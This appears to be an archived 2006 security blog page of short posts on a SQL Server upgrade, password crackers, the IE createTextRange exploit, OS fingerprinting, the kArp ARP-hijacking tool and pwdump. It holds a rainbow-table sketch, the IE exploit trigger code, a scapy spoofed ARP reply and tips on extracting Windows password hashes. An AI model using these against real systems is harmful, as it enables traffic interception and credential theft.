Darknet - The Darkside

Don't Learn to HACK - Hack to LEARN. That's our motto and we stick to it; we are all about Ethical Hacking, Penetration Testing & Computer Security. We share and comment on interesting infosec related news, tools and more. Follow us on Twitter, Facebook or RSS for the latest updates.

29 March 2006 | 8,875 views

My SQL 2005 Diary – Part 1


At the place I pretend to work, the time has come that most developers equally fear and love: upgrade time. We’ve been using MSSQL 2000 for 90% of our work for about 4 years now, and it’s served us well, but when a change as big as SQL Server 2005 comes along you have to make the leap and upgrade. I suppose a little background is in order, but I’ll have to keep it fairly general as we have some strict rules on what we talk about with people outside the development team.

What we do now

The company I work for is a travel company, one of the big ones, and as with most big travel companies we do a huge variety of things. We own resorts, broker our own insurance, sell for third parties, sell our own holidays, own/rent cruise ships, provide resort management for small hotels, and many other things, all of which are managed through 3 internal sites. We handle the telephone auto-diallers in the call centre, stock management at our Red Sea resort, the links to the main UK flight database, the payment system, our SMS marketing servers; basically, everything.
We have 3 main centres: our corporate headquarters in America, the headquarters in the UK and one huge sales centre, also in the UK. In addition to that we have either fixed-line or internet-linked terminals at all our resorts and most of the major airports, all of which connect back to our UK headquarters (it’s an ex-cupboard upstairs). Because of the international nature of our business and the resort links, the sites must run with 100% uptime, 24/7, even though they are all internal.

The sites run on a variety of different platforms, but the vast majority run on old-style ASP and SQL Server 2000, with a heavy focus on SQL Server. To put the workload in perspective, our ASP apps use approximately 5% of our servers’ total resources, with SQL Server taking the other 95% and another magical 1% running Reporting Services (an excellent application if you’ve never used it). We have a multitude of databases, but we currently run on 4 SQL servers with the databases split as equally as we can get them, to avoid having to deal with load balancing. The databases range greatly in size, from a few MB for the HR database to over 50GB for the lead details database (call centre data).

Why we’re upgrading

Due to the size and complexity of the databases, performance is extremely important and we have our indexes and maintenance jobs tuned to absolute perfection, or the entire thing would come crashing down around us and we would have a lot of angry people looking to have our heads. But recently we have hit SQL Server 2000’s “roof”, which is one of the reasons MSSQL has never challenged Oracle in the big enterprise market, and it’s proving a big problem for us. SQL Server 7 was never meant to be an enterprise-level database server, and in typical MS style a lot of SQL Server 2000 has come from that original code, as have a lot of the problems, mainly its inability to handle truly massive databases. 2005 fixes this.

SQL Server 2000 was also limited in that it handled everything via transactions and locking, so if you want to retrieve data from the database in an editable format you basically have to lock that information so nobody else can access it. This can cause all kinds of problems, such as one user being told they can’t perform an action because they’re locking themselves out (usually through bad coding), or a deadlock, where two sessions each sit waiting on a lock the other one holds. 2005 borrows from Oracle in that it uses a combination of locking and row versioning, which takes a copy of the data, performs the action on it and then puts it back into the database. This presents its own problems, but it does mean users can always get to their data.

There are also some significant coding changes, including some very cool stuff that is new to database servers as a whole. The ability to include code from other languages is one of the main talking points, which basically allows you to execute .NET code within your stored procs. This may not sound so great, but you have to consider how it changes the way a DBA will work. At the moment database code needs to be specific; because speed is always an issue, the server has to constantly optimize the way it works, and it can’t do this with vague and dynamic code. For example…

Select * from Invoice

Would bring back everything from the invoice table. But what if we just wanted a price field?

Select Invoice.Price From Invoice

That’s easy enough. But what if we wanted the gross price for insurance items, for example, but the net price for everything else? We would do this (pseudo-code):

Select (if Invoice.Category = 'INSURANCE' then Invoice.Gross else Invoice.Net end if) from Invoice

Again, it looks simple enough, but unfortunately the real code to do this is very complicated and grossly inefficient at the moment, not to mention completely impossible in certain situations. In 2005 the method above would be perfectly legal, and using Microsoft’s CLR compiler to pre-compile the code, its performance is considered adequate (it’s still not as good as plain SQL, but it’s good enough). This and the performance improvements in the new server would be enough to warrant an upgrade on their own.

What we’re doing next

We have set up two MSDN-licensed 2005 servers and mirrored our web server as a test bed for upgrading our code. Fortunately the vast majority of our code will still work, but to take advantage of the upgrades and new features we will have to re-write vast swathes of it. All of our 500+ DTS packages and jobs will have to be completely re-written too. And then comes the fun of learning an entirely new interpreter and compiler, and tuning it for maximum performance.

I’ll keep you updated



28 March 2006 | 136,922 views

Ophcrack 2.2 Password Cracker Released

Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman’s original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds.
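
If you’ve never looked at how rainbow tables work, here is a minimal Python sketch of the time-memory trade-off idea: precompute hash/reduce chains and store only the chain endpoints, then spend CPU at lookup time instead of storing every hash. Everything below (MD5, the charset, the chain length, the reduction function) is simplified for illustration; Ophcrack’s real tables target LM/NT hashes and use far more refined per-column reduction functions.

import hashlib

CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"
PW_LEN = 4          # toy password space
CHAIN_LEN = 1000    # longer chains = less storage, more CPU at lookup time

def h(pw):
    return hashlib.md5(pw.encode()).hexdigest()

def reduce_(digest, col):
    # Map a hash back into the password space; varying by column limits chain merges
    n = int(digest, 16) + col
    out = []
    for _ in range(PW_LEN):
        out.append(CHARSET[n % len(CHARSET)])
        n //= len(CHARSET)
    return "".join(out)

def chain_end(start):
    pw = start
    for col in range(CHAIN_LEN):
        pw = reduce_(h(pw), col)
    return pw

# Only (end, start) pairs are stored on disk; that is the memory saving.
table = {chain_end(s): s for s in ("aaaa", "test", "pass")}

At lookup time the cracker re-walks candidate chains from the captured hash until it hits a stored endpoint, then replays that chain from its start to recover the password, which is why cracking takes seconds rather than the days a straight brute force would.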

We mentioned it in our RainbowCrack and Rainbow Tables article.

Changes:

  • (feature) support for the new table set (alphanum + 33 special chars – WS-20k)
  • (feature) easier configuration of the table set (tables.cfg)
  • (feature) automatic selection of the number of tables to use at the same time (batch_tables) by querying the system for the size of the memory
  • (feature) speed-up in table reading
  • (feature) cleaning of the memory to make room for table readahead (Linux version only)
  • (feature) improved installer for the Windows version
  • (fix) change of the default share for pwdump4 (ADMIN$)

Get it at http://sourceforge.net/projects/ophcrack



27 March 2006 | 6,892 views

Information about the Internet Explorer createTextRange Code Execution Exploit

Internet Storm Center’s always informative Diary has some good information.

At the urging of Handler Extraordinaire Kyle Haugsness, I tested the sploit on a box with software-based DEP and DropMyRights… here are the results:

Software-based DEP protecting core Windows programs: sploit worked
Software-based DEP protecting all programs: sploit worked
DropMyRights, config’ed to allow IE to run (weakest form of DropMyRights protection): sploit worked
Active Scripting Disabled: sploit failed

So, go with the last one, if you are concerned. By the way, you should be concerned.

It didn’t take long for the exploits to appear for that IE vulnerability. One has been making the rounds that pops the calculator up (no, I’m not going to point you to the PoC code, it is easy enough to find if you read any of the standard mailing lists), but it is a relatively trivial mod to turn that into something more destructive. For that reason, SANS is raising Infocon to yellow for the next 24 hours.

Microsoft recommends you turn Active Scripting OFF to protect against this vulnerability.

Source: ISC

Yah I know, yet another reason to dump Internet Explorer and grab Firefox, not that anyone reading this site would be using Internet Exploder..

The code is along the lines of:

<input type="checkbox" id='c'>
<script>
r=document.getElementById("c");
a=r.createTextRange();
</script>

You can find the Bleeding Snort rule for the IE Exploit here.

Microsoft has now confirmed this.

“We’re still investigating, but we have confirmed this vulnerability and I am writing a Microsoft Security Advisory on this,” writes Lennart Wistrand, security program manager with the Microsoft Security Response Center, in a blog posting. “We will address it in a security update.”

There is also a 3rd party fix for this from eEye.


27 March 2006 | 8,306 views

Sealing Wafter – Defend Against OS Fingerprinting for OpenBSD

One way to defend against OS fingerprinting from tools such as nmap, queso, p0f, xprobe, etc. is to change the metrics on which they base their analysis.
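
To make those “metrics” concrete, here is a rough Python/scapy sketch (not part of Sealing Wafter, and the signature values are deliberately crude guesses) of the kind of passive check p0f-style tools perform on an incoming SYN: read the IP TTL and TCP window size and compare them against known OS defaults. Altering exactly these values in the stack is what breaks such signatures.

from scapy.all import sniff, IP, TCP

def classify(pkt):
    # Only look at SYNs (SYN set, ACK clear)
    if IP in pkt and TCP in pkt and (pkt[TCP].flags & 0x12) == 0x02:
        ttl, win = pkt[IP].ttl, pkt[TCP].window
        # Crude guesses based on common stack defaults; real tools ship big signature databases
        if ttl <= 64 and win == 5840:
            guess = "Linux 2.4/2.6?"
        elif ttl <= 128 and win in (16384, 65535):
            guess = "Windows?"
        else:
            guess = "unknown"
        print("%s: ttl=%d window=%d -> %s" % (pkt[IP].src, ttl, win, guess))

sniff(filter="tcp", prn=classify, store=False)  # needs root / packet capture privileges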

One way to do this with OpenBSD is to use Sealing Wafter.

Goals of Sealing Wafter:
1. To reduce OS detection based on well-known network stack fingerprinting behavior.
2. To have the ability to load custom rules into the stack.
3. To unload, modify and reload the kernel module with on-the-fly rules (a great feature at packet parties).
4. To learn how the magic of TCP/IP stacks works.

What Sealing Wafter currently provides:
1. Hiding from Nmap SYN/Xmas/Null scans, as well as the specific fingerprinting packets.
2. The ability to see what your stack is receiving without the need to drop your network device into promiscuous mode.
3. Complete control over rules that you can load on the fly to deal with specific incoming packets.
4. Initial passive-detection support for several OSes, based on SYNs.

Weaknesses in current Sealing Wafter:
1. Full connection scans, e.g. nmap -sT, will still find open ports. This is because I have yet to find anything that separates a real TCP connection from an nmap full connection (most likely there isn’t anything).
2. Can be very verbose when under heavy load. I have run this on my heaviest web servers, though, and have not noticed any major overhead.

Download the C code for the LKM here: Sealing Wafter


25 March 2006 | 155,706 views

Download youtube.com videos?

Ever wanted to download those cool videos from youtube.com (it’s an online video storage site, similar to imageshack.us for storing images) and can’t, because those peeps made it difficult for you to just download them for offline use? Well now you can!

Go to fileleecher.com and follow the instructions on how to copy the youtube.com video link and download the video. Once you’ve downloaded the video you’ll have to rename it to .flv if it doesn’t already have the extension. Then you’ll need an encoder to convert the .flv file into other formats; for that you’ll need the Riva FLV Encoder. The installation includes a player for FLV and the encoder for converting it to MPEG or AVI.

After all that you can do whatever you want with the videos: put them on your video iPod or PSP, or even convert them to .3GP for your mobile phone.

Many thanks to CYBERAXIS SG for this site.



25 March 2006 | 6,698 views

Spammer gets 8 years in Jail for Identity theft

Good I say, nothing worse than a spammer.

A bulk e-mailer who looted more than a billion records with personal information from a data warehouse has been sentenced to eight years in prison, federal prosecutors said Wednesday.

Scott Levine, 46, was sentenced by a federal judge in Little Rock, Ark., after being found guilty of breaking into Acxiom’s servers and downloading gigabytes of data in what the U.S. Justice Department calls one of the largest data heists to date. Acxiom, based in Little Rock, says it operates the world’s largest repository of consumer data, and counts major banks, credit card companies and the U.S. government among its customers.

In August 2005, a jury convicted Levine, a native of Boca Raton, Fla., and former chief executive of a bulk e-mail company called Snipermail.com, of 120 counts of unauthorized access to a computer connected to the Internet. The U.S. government says, however, there was no evidence that Levine used the data for identity fraud.

Looks like for some reason the FTP server had access to the SAM file, or a copy of it, and this ‘hacker’ downloaded it and then brute-forced the hashes.

I wonder if he used RainbowCrack and Rainbow Tables?

If he read this site he might have done ;)

According to court documents, Levine and others broke into an Acxiom server used for file transfers and downloaded an encrypted password file called ftpsam.txt in early 2003. Then they ran a cracking utility on the ftpsam.txt file, prosecutors said, discovered 40 percent of the passwords, and used those accounts to download even more sensitive information.

Source: News.com


24 March 2006 | 7,143 views

Is Open Source Really More Secure?

Is Open Source more secure? That’s a question that can be answered with both yes and no. Not only that, but the reasons for the “yes” and the “no” are much the same. Because you can see the source, the task of hacking or exploiting it is made easier; but at the same time, because it’s open and more easily exploited, the problems are more likely to be found.

When it comes to open source, the hackers and crackers are doing us a favour: they find the problems and bring them to the attention of the world, where some bright spark will make a fix and let us all have that too. All well and good.

However I think this could also be a problem, because let’s face it: any monkey can download “free” software to use for this or that, with little or no idea how it actually works. They don’t check for fixes and updates, often believing “it will never happen to me”. In part this is because they just don’t see any reason for someone to hack them. But in the modern world, where any script kiddie little git can download a virus construction kit or a bot to run exploits against lists of servers, it’s no longer a case of being targeted. They don’t care who you are; it’s the box they are after.

Recently a friend of mine suffered from this very problem; he didn’t believe he was worth the effort to hack. But simply by using an open source web app he unwittingly made himself a target. Though a fix was available, he wasn’t aware of it. It was only when the host contacted him about problems that he even realised he’d been exploited.

With the growing popularity of the internet and open source solutions, more and more unskilled users are installing software they don’t even understand. Even worse, as any one application grows in popularity it grows as a worthwhile target for the low-life script kiddies out there.

The problem has been exacerbated by the simple truth that with modern scripting languages such as PHP it is getting easier and easier to make something. Being able to hack code together until it works might be fun, and you might make something that does the job, but it’s not a way to make safe, secure software.

Most often exploits are based on stupid mistakes, errors that should have been found early on but weren’t because the code evolved, expanded and changed. No design, no planning, just code it until it works. This is the original meaning of “hacking”.

Now, without mentioning names, I have pulled apart the code used in the CMS the friend I mentioned earlier used, and without doubt I can say it’s poorly written. But it was free, so no one can complain.

I am sure there are some very good open source applications (Linux and Apache, to name a few), but there is even more “open source” that’s just garbage. Just because it’s free doesn’t mean it’s good. Just because it’s popular doesn’t make it better. In fact, as far as I can tell, if you want to use open source applications you’re probably better off choosing one no one else has really bothered with; that way you’re less likely to become a victim.

Closed source always has the advantage that it’s a little harder to find the problems; however, and this is important, it doesn’t mean it’s any better. As a friend of mine pointed out, open source might be easier to hack in some ways, but because of that the problems come to light and generally are fixed quickly. Whereas with a closed source application it’s actually in the interests of the authors to keep any problems hidden; if it’s not a common problem it may even go unfixed, because the author sees it as unlikely that anyone else will ever find it. Or a fix will be bundled up with a later version, and thus many people will never even know they could be at risk.

In the end I do believe open source is good for us all, but it’s important to check regularly for updates, patches and fixes. If you don’t, on your own head be it.


23 March 2006 | 9,026 views

kArp – Linux Kernel Level ARP Hijacking/Spoofing Utility

Introduction

kArp is a Linux kernel patch that allows one to implement ARP hijacking in the kernel, but control it easily from userland. You may configure, enable and disable kArp via ProcFS or the sysctl mechanism.

kArp is implemented almost at the device driver level. Any Ethernet driver (including 802.11 drivers) is supported. The kArp code sits lower than the actual ARP code in the network stack, and thus will respond to ARP requests faster than a normal machine running a normal network stack, even if the machine we’re spoofing has a CPU twice as fast as ours!
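
To show what kArp is racing to deliver, here is a userland illustration in Python/scapy of a spoofed ARP reply. This is not kArp itself (kArp answers from inside the kernel, which is why it wins the race so reliably), and the addresses and interface below are made-up lab values.

from scapy.all import ARP, Ether, sendp

VICTIM_IP, VICTIM_MAC = "192.168.1.10", "aa:bb:cc:dd:ee:10"   # hypothetical victim
IMPERSONATED_IP = "192.168.1.1"                                # the host we claim to be
OUR_MAC = "de:ad:be:ef:00:01"                                  # our interface's MAC

reply = Ether(dst=VICTIM_MAC) / ARP(
    op=2,                   # 2 = is-at (ARP reply)
    psrc=IMPERSONATED_IP,   # "I am 192.168.1.1..."
    hwsrc=OUR_MAC,          # "...and my MAC is ours"
    pdst=VICTIM_IP,
    hwdst=VICTIM_MAC,
)
sendp(reply, iface="eth0", verbose=False)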

Functionality

  • ARP Hijacking – Enabling ARP spoofing allows a user to spoof an ARP response to a specific victim host. Due to the low level at which the code exists, our spoofed packet is guaranteed to arrive at the victim’s network stack prior to the response of the machine we’ve impersonated.
  • ARP Hijacking the Impersonated – Enabling this function via arp_send_to_spoofed allows us to spoof the victim’s information to the impersonated machine as well, helping to solidify the MiM attack. However, this functionality may kill the speed of our spoofed frame to the victim, so it isn’t enabled by default.
  • ARP Flooding – Enabling this function via arp_flood causes the kernel to send a flood of broken ARP frames with random source and destination MAC addresses. On some switches this will fill or overflow the internal MAC table. Often the result of this attack is to force the switch to fall back to dumb hub mode, allowing us to sniff the wire without a MiM attack.

Warning

kArp was written to beat the race in responding to an ARP request from a target (victim) machine. It is *not* meant as a tool to flood a victim with ARP information. This means that some operating systems (Mac OS X) that ingest unsolicited ARP responses may still obtain the actual MAC address of the machine we’re impersonating. Linux, however, only accepts the fastest response. If you want to flood a machine with fake ARP responses, use a userland tool.

For now, the URL is:

http://aversion.net/~north/karp/


22 March 2006 | 6,050 views

Why Windows Vista ‘might’ Actually be Good

The main thing is the massive kernel overhaul, it’s actually adding some decent functionality and refining the architecture to become more like Linux!

While the kernel in Vista is still primarily the same one as in Windows 2000 and XP, there have been some significant changes to tighten up security. Fewer parts of the OS as a whole run in Kernel mode – most drivers run in User mode, for instance. Things that run in Kernel mode are prevented from installing without verified security certificates, and even then they require administrator-level user permission. In Vista, it should be much more difficult for unauthorized programs (like Viruses and Trojans) to affect the core of the OS and secretly harm your system.

Yay, finally, an actually secure version of Windows? It’s about time, right? But what stops malware bundling itself with a pirated yet valid certificate? There must be some offline procedure for people without full-time net connections.

We’ll have to see what this protection really offers, and how we can get around it :)

Also some heap performance improvements with controls to deal with heap fragmentation for large memory calls.

Some pretty advanced application ‘buffering’ too, not sure if I like this one (hopefully it can be turned off).

A key improvement to the root file system and memory management of Vista is a technology called SuperFetch. SuperFetch learns which applications and bits and pieces of the OS you use most and preloads them into memory, so you don’t have to wait for a bunch of hard drive paging before your apps or documents load. Microsoft has developed a pretty sophisticated prioritization scheme that can even differentiate which applications you are most likely to use at different times (on the weekend vs. during the week, or late at night vs. in the middle of the afternoon).

And well..networking? Does this finally mean THEY WROTE THEIR OWN TCP/IP STACK!?

Networking support has been extended throughout the lifetime of Windows 2000 and Windows XP, but it was getting harder and harder for Microsoft to keep improving the old code. So for Vista, they started over from ground zero and rewrote the networking stack from scratch. IPV6 was hacked onto Windows XP in a pretty basic way, but it is built directly into the Vista networking stack in a much more robust fashion.

Seems to have some fairly cool built in apps too and the new UI is very snazzy, perhaps a little too much eye-candy though, I don’t want to have to buy a Cray just to power the OS..

The browser will be running at a much reduced user level too (finally!) and it seems they are implementing proper user segregation by default (first time evar!).

I mean, I never understood why they have had ACLs since Windows NT but never set up or enforced segregation by default... like why can guest write to /windows/system and so on.

I’ll be looking out for it anyway, will you?

Source: Extremetech


21 March 2006 | 19,783 views

pwdump6 version 1.2 BETA Released

Version 1.2 (Beta) of the pwdump6 software has been released.

There are three major changes from the previous version:

  • Uses “random” named pipes (GUIDs) to allow concurrent copies of the client to run. This is predominantly for the next version of fgdump, which will be multithreaded.
  • Will turn off password histories if the requisite APIs are not available (there are instances in which this is the case) – pwdump will no longer simply refuse to grab the hashes that it can.
  • Data is now encrypted over the named pipe using the Blowfish algorithm. More information on this is available on the website.

pwdump is a very useful tool for grabbing the password hashes directly from Windows (you do need Administrator access, so in some situations you need to escalate your privileges first).

It is still useful though: normally, even with Admin access on a Windows box, you can’t get at the SAM file as it’s locked by the OS; the usual alternative is to boot from a security LiveCD and save it to a USB drive or e-mail it to yourself.

You can grab the latest version of pwdump here.

Once you have the password hashes from the SAM file you can then crack them with your favourite password cracker (LCP, Cain & Abel etc), or even RainbowCrack and Rainbow Tables.

There is another version of pwdump called fgdump on the page which I might check out in the future.
